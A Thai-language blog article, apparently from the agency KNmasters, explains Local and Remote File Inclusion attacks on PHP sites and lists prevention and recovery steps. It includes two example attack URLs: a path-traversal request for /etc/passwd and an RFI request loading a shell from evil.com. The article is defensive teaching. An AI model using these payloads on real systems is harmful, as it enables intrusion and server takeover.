หนึ่งในช่องโหว่ที่อันตรายและเกิดขึ้นบ่อยกับเว็บไซต์และเว็บแอปพลิเคชัน คือ File Inclusion Attack หรือการแทรกไฟล์อันตรายเข้าสู่ระบบผ่าน URL ซึ่งแบ่งออกเป็น 2 ประเภทหลัก ได้แก่ Remote File Inclusion (RFI) และ Local File Inclusion (LFI)
การโจมตีรูปแบบนี้เปิดโอกาสให้แฮกเกอร์สามารถเรียกใช้ไฟล์อันตรายจากภายนอกหรือแอบเข้าถึงไฟล์สำคัญในเครื่องเซิร์ฟเวอร์ ได้โดยตรง ส่งผลให้เว็บไซต์อาจถูกควบคุมจากระยะไกล ข้อมูลรั่วไหล หรือถูกฝังมัลแวร์โดยไม่รู้ตัว บทความนี้จะพาไปทำความรู้จักกับ File Inclusion Attack ว่าคืออะไร? อันตรายแค่ไหน? และวิธีป้องกันอย่างไรบ้าง?
หัวข้อ
File Inclusion Attack คืออะไร?
File Inclusion Attack คือช่องโหว่ที่เกิดจากการที่เว็บแอปพลิเคชันอนุญาตให้ผู้ใช้งานสามารถกำหนดพาธของไฟล์ที่จะโหลดหรือเรียกใช้ได้เองผ่าน URL หากไม่มีการตรวจสอบหรือกรองข้อมูลให้ดีพอ แฮกเกอร์สามารถใช้จุดนี้แทรกไฟล์อันตรายเข้ามาในระบบได้
แบ่งออกเป็น 2 ประเภทหลัก ดังนี้
1. Local File Inclusion (LFI)
- แฮกเกอร์แทรกพาธไฟล์ภายในเซิร์ฟเวอร์
- เข้าถึงไฟล์สำคัญ เช่น
/etc/passwd(Linux) หรือไฟล์ Config ของระบบ - อาจนำไปสู่การอ่านไฟล์ระบบหรือรันโค้ดอันตรายได้
2. Remote File Inclusion (RFI)
- แฮกเกอร์แทรกลิงก์ไฟล์จากภายนอก
- ดึงไฟล์ PHP, Shell Script หรือโค้ดอันตรายจาก Server ของแฮกเกอร์เข้ามารันในระบบเป้าหมาย
- ทำให้แฮกเกอร์สามารถควบคุมระบบจากระยะไกลได้ทันที
ตัวอย่างการโจมตี File Inclusion ผ่าน URL
http://example.com/index.php?page=../../../etc/passwd // ตัวอย่าง LFI
http://example.com/index.php?page=http://evil.com/shell.php // ตัวอย่าง RFIผลลัพธ์
แฮกเกอร์สามารถอ่านไฟล์สำคัญ, ฝัง Backdoor, หรือควบคุมเซิร์ฟเวอร์ได้
ผลกระทบของ File Inclusion Attack
- ข้อมูลสำคัญรั่วไหล เช่น Database Config, Password
- เว็บไซต์ถูกแฮกหรือฝัง Backdoor ทำให้แฮกเกอร์ควบคุมระบบได้
- ฝังมัลแวร์หรือสคริปต์อันตราย ส่งผลต่อผู้ใช้งานเว็บไซต์
- อันดับ SEO ตกทันทีเพราะ Google มองว่าเว็บไซต์มีมัลแวร์
- ภาพลักษณ์องค์กรเสียหายและเสี่ยงต่อการถูกฟ้องร้อง
สาเหตุที่เว็บไซต์เสี่ยงต่อ File Inclusion Attack
- ใช้ PHP หรือระบบที่โหลดไฟล์จากพารามิเตอร์ URL โดยไม่มีการตรวจสอบ
- รับค่า Input โดยตรงจากผู้ใช้งานโดยไม่ Validate
- ใช้ฟังก์ชัน PHP เช่น include(), require(), include_once(), require_once() โดยไม่มีการกรองค่า
- อัปเดตระบบไม่สม่ำเสมอทำให้มีช่องโหว่
วิธีป้องกัน File Inclusion Attack (RFI / LFI)
- หลีกเลี่ยงการโหลดไฟล์จาก Input ของผู้ใช้โดยตรง
- ตรวจสอบและ Validate ค่า Input ทุกครั้ง
- จำกัดให้เลือกเฉพาะไฟล์ที่กำหนดไว้เท่านั้น
- ใช้ Whitelist
- ปิดการใช้งาน allow_url_include และ allow_url_fopen ใน php.ini
- ตั้ง Directory Permissions ให้เหมาะสม ป้องกันการเข้าถึงไฟล์สำคัญ
- อัปเดต PHP และระบบ CMS ให้เป็นเวอร์ชันล่าสุดเสมอ
- ติดตั้ง Web Application Firewall (WAF) เพื่อช่วยป้องกันการโจมตี
- สำรองข้อมูลเว็บไซต์อย่างสม่ำเสมอเพื่อกู้คืนได้ทันทีหากเกิดเหตุ
แนวทางแก้ไขเมื่อถูกโจมตีด้วย File Inclusion Attack
- เปลี่ยนรหัสผ่านทุกระบบทันที
- ตรวจสอบไฟล์ระบบและโค้ด PHP ทั้งหมดเพื่อหาสคริปต์อันตรายหรือ Backdoor
- สแกนเซิร์ฟเวอร์ด้วยเครื่องมือความปลอดภัย เช่น Wordfence, Sucuri
- ลบโค้ดหรือไฟล์ที่แฮกเกอร์แทรกเข้ามา
- Restore จาก Backup ที่ปลอดภัย
- ปิดช่องโหว่และอัปเดตระบบทันทีเพื่อไม่ให้เกิดซ้ำ
สรุป
File Inclusion Attack (RFI / LFI) เป็นหนึ่งในการโจมตีที่อันตรายและพบได้บ่อย โดยเฉพาะเว็บไซต์ที่พัฒนาโดย PHP และรับค่า Input ผ่าน URL หากไม่มีการกรองหรือตรวจสอบข้อมูลให้ดี อาจเปิดโอกาสให้แฮกเกอร์แทรกไฟล์อันตรายเข้ามาในระบบได้ง่ายๆ
การป้องกันต้องเริ่มตั้งแต่การออกแบบโครงสร้างเว็บไซต์ให้ปลอดภัยไปจนถึงการตั้งค่าระบบและตรวจสอบ Input ทุกครั้ง เพื่อให้เว็บไซต์ปลอดภัยจากการโจมตีและป้องกันความเสียหายที่อาจเกิดขึ้นในอนาคต
อย่ารอช้า! ให้ KNmasters ดูแลธุรกิจของคุณวันนี้!
หากคุณต้องการข้อมูลเพิ่มเติมหรืออยากเริ่มใช้บริการกับ KNmasters เราพร้อมช่วยให้ธุรกิจของคุณเติบโตด้วยกลยุทธ์การตลาดออนไลน์ครบวงจร
- Facebook: KNmasters
- LINE: KNmasters
- Youtube: KNmasters
- Instagram: knmasters.official
- Tiktok: KNmasters.official
- Twitter: KNmasters Official
- เว็บไซต์: www.knmasters.com
- แผนที่: KNmasters



